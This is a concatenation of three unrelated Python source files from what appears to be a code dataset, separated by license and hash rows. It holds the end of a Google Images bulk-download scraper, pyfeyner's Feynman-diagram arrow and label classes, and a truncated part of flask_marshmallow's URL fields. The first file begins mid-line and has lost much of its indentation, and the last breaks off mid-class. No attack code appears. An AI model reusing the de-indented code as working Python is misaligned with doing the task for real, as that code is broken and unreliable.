search_term.encode('utf-8')) + '&as_sitesearch=' + specific_site + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
else:
url = 'https://www.google.com/search?q=' + quote(
search_term.encode('utf-8')) + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch' + params + '&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
#safe search check
if safe_search:
url = url + safe_search_string
return url
#measures the file size
def file_size(self,file_path):
if os.path.isfile(file_path):
file_info = os.stat(file_path)
size = file_info.st_size
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if size < 1024.0:
return "%3.1f %s" % (size, x)
size /= 1024.0
return size
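    # Illustrative example (a hedged sketch added as a comment; the path is
    # hypothetical):
    #     self.file_size("downloads/cat.jpg")   # -> e.g. "34.2 KB"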
#keywords from file
def keywords_from_file(self,file_name):
search_keyword = []
with codecs.open(file_name, 'r', encoding='utf-8-sig') as f:
if '.csv' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
elif '.txt' in file_name:
for line in f:
if line in ['\n', '\r\n']:
pass
else:
search_keyword.append(line.replace('\n', '').replace('\r', ''))
else:
print("Invalid file type: Valid file types are either .txt or .csv \n"
"exiting...")
sys.exit()
return search_keyword
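    # Illustrative input (a hedged sketch added as a comment): the keywords
    # file is a plain .txt or .csv with one search term per line, e.g.
    #     polar bears
    #     northern lights
    # Blank lines are skipped by the loop above.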
# make directories
    def create_directories(self,main_directory, dir_name,thumbnail,thumbnail_only):
        dir_name_thumbnail = dir_name + " - thumbnail"
        # make the main directory (if needed) and the search keyword sub-directories
        try:
            if not os.path.exists(main_directory):
                os.makedirs(main_directory)
                time.sleep(0.2)
            sub_directory = os.path.join(main_directory, dir_name)
            if not os.path.exists(sub_directory):
                os.makedirs(sub_directory)
            if thumbnail or thumbnail_only:
                sub_directory_thumbnail = os.path.join(main_directory, dir_name_thumbnail)
                if not os.path.exists(sub_directory_thumbnail):
                    os.makedirs(sub_directory_thumbnail)
        except OSError as e:
            if e.errno != 17:
                raise
        return
# Download Image thumbnails
def download_image_thumbnail(self,image_url,main_directory,dir_name,return_image_name,print_urls,socket_timeout,print_size,no_download,save_source,img_src,ignore_urls):
if print_urls or no_download:
print("Image URL: " + image_url)
if no_download:
return "success","Printed url without downloading"
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if socket_timeout:
timeout = float(socket_timeout)
else:
timeout = 10
response = urlopen(req, None, timeout)
data = response.read()
response.close()
path = main_directory + "/" + dir_name + " - thumbnail" + "/" + return_image_name
                try:
                    output_file = open(path, 'wb')
                    output_file.write(data)
                    output_file.close()
                    if save_source:
                        list_path = main_directory + "/" + save_source + ".txt"
                        list_file = open(list_path,'a')
                        list_file.write(path + '\t' + img_src + '\n')
                        list_file.close()
                    # report success only if the write above actually succeeded
                    download_status = 'success'
                    download_message = "Completed Image Thumbnail ====> " + return_image_name
                except OSError as e:
                    download_status = 'fail'
                    download_message = "OSError on an image...trying next one..." + " Error: " + str(e)
                except IOError as e:
                    download_status = 'fail'
                    download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
# image size parameter
if print_size:
print("Image Size: " + str(self.file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return download_status, download_message
# Download Images
def download_image(self,image_url,image_format,main_directory,dir_name,count,print_urls,socket_timeout,prefix,print_size,no_numbering,no_download,save_source,img_src,silent_mode,thumbnail_only,format,ignore_urls):
if not silent_mode:
if print_urls or no_download:
print("Image URL: " + image_url)
if ignore_urls:
if any(url in image_url for url in ignore_urls.split(',')):
return "fail", "Image ignored due to 'ignore url' parameter", None, image_url
if thumbnail_only:
return "success", "Skipping image download...", str(image_url[(image_url.rfind('/')) + 1:]), image_url
if no_download:
return "success","Printed url without downloading",None,image_url
try:
req = Request(image_url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
try:
# timeout time to download an image
if socket_timeout:
timeout = float(socket_timeout)
else:
timeout = 10
response = urlopen(req, None, timeout)
data = response.read()
response.close()
extensions = [".jpg", ".jpeg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico"]
# keep everything after the last '/'
image_name = str(image_url[(image_url.rfind('/')) + 1:])
if format:
if not image_format or image_format != format:
download_status = 'fail'
download_message = "Wrong image format returned. Skipping..."
return_image_name = ''
absolute_path = ''
return download_status, download_message, return_image_name, absolute_path
if image_format == "" or not image_format or "." + image_format not in extensions:
download_status = 'fail'
download_message = "Invalid or missing image format. Skipping..."
return_image_name = ''
absolute_path = ''
return download_status, download_message, return_image_name, absolute_path
elif image_name.lower().find("." + image_format) < 0:
image_name = image_name + "." + image_format
else:
image_name = image_name[:image_name.lower().find("." + image_format) + (len(image_format) + 1)]
# prefix name in image
if prefix:
prefix = prefix + " "
else:
prefix = ''
if no_numbering:
path = main_directory + "/" + dir_name + "/" + prefix + image_name
else:
path = main_directory + "/" + dir_name + "/" + prefix + str(count) + "." + image_name
                try:
                    output_file = open(path, 'wb')
                    output_file.write(data)
                    output_file.close()
                    if save_source:
                        list_path = main_directory + "/" + save_source + ".txt"
                        list_file = open(list_path,'a')
                        list_file.write(path + '\t' + img_src + '\n')
                        list_file.close()
                    absolute_path = os.path.abspath(path)
                    # return image name back to calling method to use it for thumbnail downloads;
                    # report success only if the write above actually succeeded
                    download_status = 'success'
                    download_message = "Completed Image ====> " + prefix + str(count) + "." + image_name
                    return_image_name = prefix + str(count) + "." + image_name
                except OSError as e:
                    download_status = 'fail'
                    download_message = "OSError on an image...trying next one..." + " Error: " + str(e)
                    return_image_name = ''
                    absolute_path = ''
# image size parameter
if not silent_mode:
if print_size:
print("Image Size: " + str(self.file_size(path)))
except UnicodeEncodeError as e:
download_status = 'fail'
download_message = "UnicodeEncodeError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except BadStatusLine as e:
download_status = 'fail'
download_message = "BadStatusLine on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except HTTPError as e: # If there is any HTTPError
download_status = 'fail'
download_message = "HTTPError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except URLError as e:
download_status = 'fail'
download_message = "URLError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except ssl.CertificateError as e:
download_status = 'fail'
download_message = "CertificateError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except IOError as e: # If there is any IOError
download_status = 'fail'
download_message = "IOError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
except IncompleteRead as e:
download_status = 'fail'
download_message = "IncompleteReadError on an image...trying next one..." + " Error: " + str(e)
return_image_name = ''
absolute_path = ''
return download_status,download_message,return_image_name,absolute_path
# Finding 'Next Image' from the given raw page
def _get_next_item(self,s):
start_line = s.find('rg_meta notranslate')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('class="rg_meta notranslate">')
start_object = s.find('{', start_line + 1)
end_object = s.find('</div>', start_object + 1)
object_raw = str(s[start_object:end_object])
#remove escape characters based on python version
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: #python3
try:
object_decode = bytes(object_raw, "utf-8").decode("unicode_escape")
final_object = json.loads(object_decode)
except:
final_object = ""
else: #python2
try:
final_object = (json.loads(self.repair(object_raw)))
except:
final_object = ""
return final_object, end_object
# Getting all links with the help of '_images_get_next_image'
def _get_all_items(self,page,main_directory,dir_name,limit,arguments):
items = []
abs_path = []
errorCount = 0
i = 0
count = 1
while count < limit+1:
object, end_content = self._get_next_item(page)
if object == "no_links":
break
elif object == "":
page = page[end_content:]
elif arguments['offset'] and count < int(arguments['offset']):
count += 1
page = page[end_content:]
else:
#format the item for readability
object = self.format_object(object)
if arguments['metadata']:
if not arguments["silent_mode"]:
print("\nImage Metadata: " + str(object))
#download the images
download_status,download_message,return_image_name,absolute_path = self.download_image(object['image_link'],object['image_format'],main_directory,dir_name,count,arguments['print_urls'],arguments['socket_timeout'],arguments['prefix'],arguments['print_size'],arguments['no_numbering'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments["silent_mode"],arguments["thumbnail_only"],arguments['format'],arguments['ignore_urls'])
if not arguments["silent_mode"]:
print(download_message)
if download_status == "success":
# download image_thumbnails
if arguments['thumbnail'] or arguments["thumbnail_only"]:
download_status, download_message_thumbnail = self.download_image_thumbnail(object['image_thumbnail_url'],main_directory,dir_name,return_image_name,arguments['print_urls'],arguments['socket_timeout'],arguments['print_size'],arguments['no_download'],arguments['save_source'],object['image_source'],arguments['ignore_urls'])
if not arguments["silent_mode"]:
print(download_message_thumbnail)
count += 1
object['image_filename'] = return_image_name
items.append(object) # Append all the links in the list named 'Links'
abs_path.append(absolute_path)
else:
errorCount += 1
#delay param
if arguments['delay']:
time.sleep(int(arguments['delay']))
page = page[end_content:]
i += 1
if count < limit:
            print("\n\nUnfortunately all " + str(
                limit) + " images could not be downloaded because some images were not downloadable. " + str(
                count-1) + " is all we got for this search filter!")
return items,errorCount,abs_path
# Bulk Download
def download(self,arguments):
paths_agg = {}
# for input coming from other python files
if __name__ != "__main__":
# if the calling file contains config_file param
if 'config_file' in arguments:
records = []
json_file = json.load(open(arguments['config_file']))
for record in range(0, len(json_file['Records'])):
arguments = {}
for i in args_list:
arguments[i] = None
for key, value in json_file['Records'][record].items():
arguments[key] = value
records.append(arguments)
total_errors = 0
for rec in records:
paths, errors = self.download_executor(rec)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
                            print(str(paths).encode('raw_unicode_escape').decode('utf-8'))
total_errors = total_errors + errors
return paths_agg,total_errors
# if the calling file contains params directly
else:
paths, errors = self.download_executor(arguments)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
                        print(str(paths).encode('raw_unicode_escape').decode('utf-8'))
return paths_agg, errors
# for input coming from CLI
else:
paths, errors = self.download_executor(arguments)
for i in paths:
paths_agg[i] = paths[i]
if not arguments["silent_mode"]:
if arguments['print_paths']:
                    print(str(paths).encode('raw_unicode_escape').decode('utf-8'))
return paths_agg, errors
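    # Typical library usage (a hedged sketch added as a comment; actual
    # results depend on Google's markup at the time of running):
    #     from google_images_download import google_images_download
    #     response = google_images_download.googleimagesdownload()
    #     paths, errors = response.download({"keywords": "polar bears",
    #                                        "limit": 5, "print_urls": True})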
def download_executor(self,arguments):
paths = {}
errorCount = None
for arg in args_list:
if arg not in arguments:
arguments[arg] = None
######Initialization and Validation of user arguments
if arguments['keywords']:
search_keyword = [str(item) for item in arguments['keywords'].split(',')]
if arguments['keywords_from_file']:
search_keyword = self.keywords_from_file(arguments['keywords_from_file'])
# both time and time range should not be allowed in the same query
if arguments['time'] and arguments['time_range']:
raise ValueError('Either time or time range should be used in a query. Both cannot be used at the same time.')
        # both size and exact size should not be allowed in the same query
if arguments['size'] and arguments['exact_size']:
raise ValueError('Either "size" or "exact_size" should be used in a query. Both cannot be used at the same time.')
# both image directory and no image directory should not be allowed in the same query
if arguments['image_directory'] and arguments['no_directory']:
raise ValueError('You can either specify image directory or specify no image directory, not both!')
        # Additional words added after the main keyword
if arguments['suffix_keywords']:
suffix_keywords = [" " + str(sk) for sk in arguments['suffix_keywords'].split(',')]
else:
suffix_keywords = ['']
        # Additional words added before the main keyword
if arguments['prefix_keywords']:
prefix_keywords = [str(sk) + " " for sk in arguments['prefix_keywords'].split(',')]
else:
prefix_keywords = ['']
# Setting limit on number of images to be downloaded
if arguments['limit']:
limit = int(arguments['limit'])
else:
limit = 100
if arguments['url']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
if arguments['similar_images']:
current_time = str(datetime.datetime.now()).split('.')[0]
search_keyword = [current_time.replace(":", "_")]
# If single_image or url argument not present then keywords is mandatory argument
if arguments['single_image'] is None and arguments['url'] is None and arguments['similar_images'] is None and \
arguments['keywords'] is None and arguments['keywords_from_file'] is None:
print('-------------------------------\n'
'Uh oh! Keywords is a required argument \n\n'
'Please refer to the documentation on guide to writing queries \n'
'https://github.com/hardikvasa/google-images-download#examples'
'\n\nexiting!\n'
'-------------------------------')
sys.exit()
# If this argument is present, set the custom output directory
if arguments['output_directory']:
main_directory = arguments['output_directory']
else:
main_directory = "downloads"
# Proxy settings
if arguments['proxy']:
os.environ["http_proxy"] = arguments['proxy']
os.environ["https_proxy"] = arguments['proxy']
######Initialization Complete
total_errors = 0
for pky in prefix_keywords: # 1.for every prefix keywords
for sky in suffix_keywords: # 2.for every suffix keywords
i = 0
while i < len(search_keyword): # 3.for every main keyword
iteration = "\n" + "Item no.: " + str(i + 1) + " -->" + " Item name = " + (pky) + (search_keyword[i]) + (sky)
if not arguments["silent_mode"]:
print(iteration.encode('raw_unicode_escape').decode('utf-8'))
print("Evaluating...")
else:
print("Downloading images for: " + (pky) + (search_keyword[i]) + (sky) + " ...")
search_term = pky + search_keyword[i] + sky
if arguments['image_directory']:
dir_name = arguments['image_directory']
elif arguments['no_directory']:
dir_name = ''
else:
dir_name = search_term + ('-' + arguments['color'] if arguments['color'] else '') #sub-directory
if not arguments["no_download"]:
self.create_directories(main_directory,dir_name,arguments['thumbnail'],arguments['thumbnail_only']) #create directories in OS
params = self.build_url_parameters(arguments) #building URL with params
url = self.build_search_url(search_term,params,arguments['url'],arguments['similar_images'],arguments['specific_site'],arguments['safe_search']) #building main search url
if limit < 101:
raw_html = self.download_page(url) # download page
else:
raw_html = self.download_extended_page(url,arguments['chromedriver'])
if not arguments["silent_mode"]:
if arguments['no_download']:
print("Getting URLs without downloading images...")
else:
print("Starting Download...")
items,errorCount,abs_path = self._get_all_items(raw_html,main_directory,dir_name,limit,arguments) #get all image items and download images
paths[pky + search_keyword[i] + sky] = abs_path
#dumps into a json file
if arguments['extract_metadata']:
try:
if not os.path.exists("logs"):
os.makedirs("logs")
except OSError as e:
print(e)
json_file = open("logs/"+search_keyword[i]+".json", "w")
json.dump(items, json_file, indent=4, sort_keys=True)
json_file.close()
#Related images
if arguments['related_images']:
print("\nGetting list of related keywords...this may take a few moments")
tabs = self.get_all_tabs(raw_html)
for key, value in tabs.items():
final_search_term = (search_term + " - " + key)
print("\nNow Downloading - " + final_search_term)
if limit < 101:
new_raw_html = self.download_page(value) # download page
else:
new_raw_html = self.download_extended_page(value,arguments['chromedriver'])
self.create_directories(main_directory, final_search_term,arguments['thumbnail'],arguments['thumbnail_only'])
self._get_all_items(new_raw_html, main_directory, search_term + " - " + key, limit,arguments)
i += 1
total_errors = total_errors + errorCount
if not arguments["silent_mode"]:
print("\nErrors: " + str(errorCount) + "\n")
return paths, total_errors
#------------- Main Program -------------#
def main():
records = user_input()
total_errors = 0
t0 = time.time() # start the timer
for arguments in records:
if arguments['single_image']: # Download Single Image using a URL
response = googleimagesdownload()
response.single_image(arguments['single_image'])
else: # or download multiple images based on keywords/keyphrase search
response = googleimagesdownload()
paths,errors = response.download(arguments) #wrapping response in a variable just for consistency
total_errors = total_errors + errors
t1 = time.time() # stop the timer
    total_time = t1 - t0  # Calculating the total time required to crawl, find and download all the requested images
if not arguments["silent_mode"]:
print("\nEverything downloaded!")
print("Total errors: " + str(total_errors))
print("Total time taken: " + str(total_time) + " Seconds")
if __name__ == "__main__":
main()
| mit | -2,625,954,641,360,469,500 | 50.941642 | 622 | 0.552625 | false |
itoijala/pyfeyner | pyfeyner/deco.py | 1 | 12057 | #
# pyfeyner - a simple Python interface for making Feynman diagrams.
# Copyright (C) 2005-2010 Andy Buckley, Georg von Hippel
# Copyright (C) 2013 Ismo Toijala
#
# pyfeyner is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pyfeyner is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with pyfeyner; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""A couple of classes for decorating diagram elements."""
import math
import pyx
from pyfeyner.diagrams import FeynDiagram
from pyfeyner.utils import Visible
from pyfeyner import config
class Arrow(pyx.deco.deco, pyx.attr.attr):
"""Arrow for Feynman diagram lines"""
def __init__(self, pos=0.5, size=6*pyx.unit.v_pt,
angle=45, constriction=0.8):
self.pos = pos
self.size = size
self.angle = angle
self.constriction = constriction
def decorate(self, dp, texrunner=pyx.text.defaulttexrunner):
"""Attach arrow to a path (usually a line)."""
dp.ensurenormpath()
constrictionlen = self.size * self.constriction * \
math.cos(self.angle * math.pi / 360.0)
arrowtopos = self.pos * dp.path.arclen() + 0.5 * self.size
arrowtopath = dp.path.split(arrowtopos)[0]
arrowpath = pyx.deco._arrowhead(arrowtopath, self.pos*dp.path.arclen(),
1, self.size, 45, True, constrictionlen)
dp.ornaments.fill(arrowpath)
return dp
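# Illustrative usage (a hedged sketch added as a comment): since Arrow is a
# PyX decorator/attribute, it can be passed among the styles when stroking
# any path, e.g.
#     canvas.stroke(pyx.path.line(0, 0, 2, 0), [Arrow(pos=0.5)])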
class FreeArrow(Visible):
"""Arrow not attached to any line in a diagram."""
def __init__(self, length=0.5 * pyx.unit.v_cm, size=6 * pyx.unit.v_pt,
angle=45, constriction=0.8, pos=None, x=None, y=None,
direction=0):
self.x, self.y = 0, 0
if x is not None:
self.x = x
if y is not None:
self.y = y
if pos is not None:
self.x, self.y = pos.getXY()
self.direction = direction
self.length = length
self.size = size
self.angle = angle
self.constriction = constriction
def draw(self, canvas):
"""Draw this arrow on the supplied canvas."""
endx, endy = self.x - self.length * math.sin(self.direction * math.pi / 180.0), \
self.y - self.length * math.cos(self.direction * math.pi / 180.0)
linepath = pyx.deco.decoratedpath(pyx.path.path(pyx.path.moveto(endx, endy),
pyx.path.lineto(self.x, self.y)))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
canvas.stroke(linepath.path, styles)
class ParallelArrow(Visible):
"""Arrow running parallel to a line, for momenta, helicities etc."""
def __init__(self, line, pos=0.5, displace=0.3, length=0.5 * pyx.unit.v_cm,
size=6 * pyx.unit.v_pt, angle=45, constriction=0.8, sense=1,
curved=False, stems=1, stemsep=0.03):
self.line = line
self.pos = pos
self.displace = pyx.unit.length(displace)
self.length = length
self.size = size
self.angle = angle
self.constriction = constriction
self.sense = sense
self.curved = curved
self.stems = stems
self.stemsep = stemsep
def draw(self, canvas):
"""Draw this arrow on the supplied canvas."""
p = self.line.getPath()
posparam = p.begin() + self.pos * p.arclen()
x, y = self.line.fracpoint(self.pos).getXY()
arrx, arry = self.line.fracpoint(self.pos + self.length / 2.0 / p.arclen()).getXY()
endx, endy = self.line.fracpoint(self.pos - self.length / 2.0 / p.arclen()).getXY()
# Calculate the displacement from the line
displacement = self.displace
intrinsicwidth = pyx.unit.length(0.1)
if hasattr(self.line, "arcradius"):
intrinsicwidth = self.line.arcradius
if displacement > 0:
displacement += intrinsicwidth
else:
displacement -= intrinsicwidth
if config.DEBUG:
            print("Displacement = %s" % displacement)
# Position the arrow on the right hand side of lines
tangent = p.tangent(posparam, displacement)
normal = tangent.transformed(pyx.trafo.rotate(90, x, y))
nx, ny = normal.atend()
nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y)
vx, vy = p.atbegin()
vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy)
# If the arrow is on the left, flip it by 180 degrees
if (vxcm * nycm - vycm * nxcm) > 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
if displacement < 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
# Displace the arrow by this normal vector
endx, endy = endx + (nx - x), endy + (ny - y)
arrx, arry = arrx + (nx - x), arry + (ny - y)
if self.sense < 0:
arrx, arry, endx, endy = endx, endy, arrx, arry
if not self.curved:
linepath = pyx.path.path(pyx.path.moveto(endx, endy),
pyx.path.lineto(arrx, arry))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
dist = self.stemsep
n = self.stems
if n > 1: # helicity style arrow
arrowtopath = linepath.split(0.8 * linepath.arclen())[0]
constrictionlen = self.size * self.constriction * \
math.cos(self.angle * math.pi / 360.0)
arrowpath = pyx.deco._arrowhead(arrowtopath,
linepath.arclen(),
1, self.size, 45,
True, constrictionlen)
canvas.fill(arrowpath)
path = pyx.deformer.parallel(-(n + 1) / 2 * dist).deform(arrowtopath)
defo = pyx.deformer.parallel(dist)
for m in range(n):
path = defo.deform(path)
canvas.stroke(path, [])
else: # ordinary (momentum) arrow
canvas.stroke(linepath, styles)
else: # curved arrow (always momentum-style)
curvepiece = self.line.getPath().split([(self.pos*p.arclen()-self.length/2.0),
(self.pos*p.arclen()+self.length/2.0)])
arrpiece = curvepiece[1]
if self.sense < 0:
arrpiece = arrpiece.reversed()
linepath = pyx.deco.decoratedpath(pyx.deformer.parallel(displacement).deform(arrpiece))
styles = [pyx.deco.earrow(size=self.size, angle=self.angle,
constriction=self.constriction)]
canvas.stroke(linepath.path, styles)
class Label(Visible):
"""General label, unattached to any diagram elements"""
def __init__(self, text, pos=None, x=None, y=None, size=pyx.text.size.normalsize):
self.x, self.y = 0, 0
if x is not None:
self.x = x
if y is not None:
self.y = y
self.size = size
self.text = text
self.textattrs = []
self.pos = pos
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(self.x, self.y, self.text, textattrs)
canvas.insert(t)
class PointLabel(Label):
"""Label attached to points on the diagram"""
def __init__(self, point, text, displace=0.3, angle=0, size=pyx.text.size.normalsize):
self.size = size
self.displace = pyx.unit.length(displace)
self.angle = angle
self.text = text
self.point = point
self.textattrs = []
def getPoint(self):
"""Get the point associated with this label."""
return self.point
def setPoint(self, point):
"""Set the point associated with this label."""
self.point = point
return self
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
x = self.point.getX() + self.displace * math.cos(math.radians(self.angle))
y = self.point.getY() + self.displace * math.sin(math.radians(self.angle))
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs)
canvas.insert(t)
class LineLabel(Label):
"""Label for Feynman diagram lines"""
def __init__(self, line, text, pos=0.5, displace=0.3, angle=0, size=pyx.text.size.normalsize):
self.pos = pos
self.size = size
self.displace = pyx.unit.length(displace)
self.angle = angle
self.text = text
self.line = line
self.textattrs = []
def getLine(self):
"""Get the associated line."""
return self.line
def setLine(self, line):
"""Set the associated line."""
self.line = line
return self
def draw(self, canvas):
"""Draw this label on the supplied canvas."""
p = self.line.getPath()
#x, y = self.line.fracPoint(self.pos).getXY()
posparam = p.begin() + self.pos * p.arclen()
x, y = p.at(posparam)
# Calculate the displacement from the line
displacement = self.displace
intrinsicwidth = pyx.unit.length(0.1)
if hasattr(self.line, "arcradius"):
intrinsicwidth = self.line.arcradius
if displacement > 0:
displacement += intrinsicwidth
else:
displacement -= intrinsicwidth
if config.DEBUG:
            print("Displacement = %s" % displacement)
# Position the label on the right hand side of lines
tangent = p.tangent(posparam, displacement)
normal = tangent.transformed(pyx.trafo.rotate(90, x, y))
nx, ny = normal.atend()
nxcm, nycm = pyx.unit.tocm(nx - x), pyx.unit.tocm(ny - y)
vx, vy = p.atbegin()
vxcm, vycm = pyx.unit.tocm(x - vx), pyx.unit.tocm(y - vy)
# If the label is on the left, flip it by 180 degrees
if (vxcm * nycm - vycm * nxcm) > 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
if displacement < 0:
normal = normal.transformed(pyx.trafo.rotate(180, x, y))
nx, ny = normal.atend()
# Displace the label by this normal vector
x, y = nx, ny
textattrs = pyx.attr.mergeattrs([pyx.text.halign.center,
pyx.text.vshift.mathaxis,
self.size] + self.textattrs)
t = pyx.text.defaulttexrunner.text(x, y, self.text, textattrs)
#t.linealign(self.displace,
# math.cos(self.angle * math.pi/180),
# math.sin(self.angle * math.pi/180))
canvas.insert(t)
__all__ = ["Arrow", "FreeArrow", "ParallelArrow", "Label", "PointLabel", "LineLabel"]
| gpl-2.0 | 4,276,754,985,112,377,000 | 38.661184 | 99 | 0.565066 | false |
tranthibaokhanh/thoughtloungev2 | lib/flask_marshmallow_local/fields.py | 1 | 4727 |
# -*- coding: utf-8 -*-
"""
flask_marshmallow.fields
~~~~~~~~~~~~~~~~~~~~~~~~
Custom, Flask-specific fields. See the following link for a list of all available
fields from the marshmallow library.
See http://marshmallow.readthedocs.org/en/latest/api_reference.html#module-marshmallow.fields
"""
import re
import sys
from marshmallow import fields, utils
from marshmallow.exceptions import ForcedError
from flask import url_for
from werkzeug.routing import BuildError
# Py2/3 compatibility
PY2 = sys.version_info[0] == 2
if not PY2:
iteritems = lambda d: iter(d.items())
else:
iteritems = lambda d: d.iteritems()
_tpl_pattern = re.compile(r'\s*<\s*(\S*)\s*>\s*')
__all__ = [
'URLFor',
'UrlFor',
'AbsoluteURLFor',
'AbsoluteUrlFor',
'Hyperlinks',
]
def _tpl(val):
"""Return value within ``< >`` if possible, else return ``None``."""
match = _tpl_pattern.match(val)
if match:
return match.groups()[0]
return None
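# Illustrative examples (a hedged sketch added as a comment):
#     _tpl('<id>')   # -> 'id'
#     _tpl('id')     # -> None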
class URLFor(fields.Field):
"""Field that outputs the URL for an endpoint. Acts identically to
Flask's ``url_for`` function, except that arguments can be pulled from the
object to be serialized.
Usage: ::
url = URLFor('author_get', id='<id>')
https_url = URLFor('author_get', id='<id>', _scheme='https', _external=True)
:param str endpoint: Flask endpoint name.
:param kwargs: Same keyword arguments as Flask's url_for, except string
arguments enclosed in `< >` will be interpreted as attributes to pull
from the object.
"""
_CHECK_ATTRIBUTE = False
def __init__(self, endpoint, **kwargs):
self.endpoint = endpoint
self.params = kwargs
fields.Field.__init__(self, **kwargs)
def _format(self, val):
return val
def _serialize(self, value, key, obj):
"""Output the URL for the endpoint, given the kwargs passed to
``__init__``.
"""
param_values = {}
for name, attr_tpl in iteritems(self.params):
attr_name = _tpl(str(attr_tpl))
if attr_name:
attribute_value = utils.get_value(attr_name, obj, default=fields.missing)
if attribute_value is not fields.missing:
param_values[name] = attribute_value
else:
raise ForcedError(AttributeError(
'{attr_name!r} is not a valid '
'attribute of {obj!r}'.format(
attr_name=attr_name, obj=obj,
)))
else:
param_values[name] = attr_tpl
try:
return url_for(self.endpoint, **param_values)
except BuildError as err: # Make sure BuildErrors are raised
raise ForcedError(err)
UrlFor = URLFor
class AbsoluteURLFor(URLFor):
"""Field that outputs the absolute URL for an endpoint."""
def __init__(self, endpoint, **kwargs):
kwargs['_external'] = True
URLFor.__init__(self, endpoint=endpoint, **kwargs)
def _format(self, val):
return val
AbsoluteUrlFor = AbsoluteURLFor
def _rapply(d, func, *args, **kwargs):
"""Apply a function to all values in a dictionary, recursively."""
if isinstance(d, dict):
return {
key: _rapply(value, func, *args, **kwargs)
for key, value in iteritems(d)
}
else:
return func(d, *args, **kwargs)
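# For illustration:
#     _rapply({'a': {'b': 1}, 'c': 2}, lambda v: v * 10)
#     # -> {'a': {'b': 10}, 'c': 20}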
def _url_val(val, key, obj, **kwargs):
"""Function applied by `HyperlinksField` to get the correct value in the
schema.
"""
if isinstance(val, URLFor):
return val.serialize(key, obj, **kwargs)
else:
return val
class Hyperlinks(fields.Field):
"""Field that outputs a dictionary of hyperlinks,
    given a dictionary schema with :class:`URLFor <flask_marshmallow.fields.URLFor>`
    objects as values.
    Example: ::
        _links = Hyperlinks({
            'self': URLFor('author', id='<id>'),
            'collection': URLFor('author_list'),
        })
    `URLFor` objects can be nested within the dictionary. ::
        _links = Hyperlinks({
            'self': {
                'href': URLFor('book', id='<id>'),
                'title': 'book detail'
            }
        })
    :param dict schema: A dict that maps names to
        :class:`URLFor <flask_marshmallow.fields.URLFor>` endpoints.
"""
_CHECK_ATTRIBUTE = False
def __init__(self, schema, **kwargs):
self.schema = schema
fields.Field.__init__(self, **kwargs)
def _format(self, val):
return val
def _serialize(self, value, attr, obj):
return _rapply(self.schema, _url_val, key=attr, obj=obj)
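# A schema-level usage sketch (hypothetical, not part of this module; assumes
# a Flask request context so that url_for() can build the URLs):
#
#     from marshmallow import Schema
#
#     class AuthorSchema(Schema):
#         id = fields.Integer()
#         _links = Hyperlinks({
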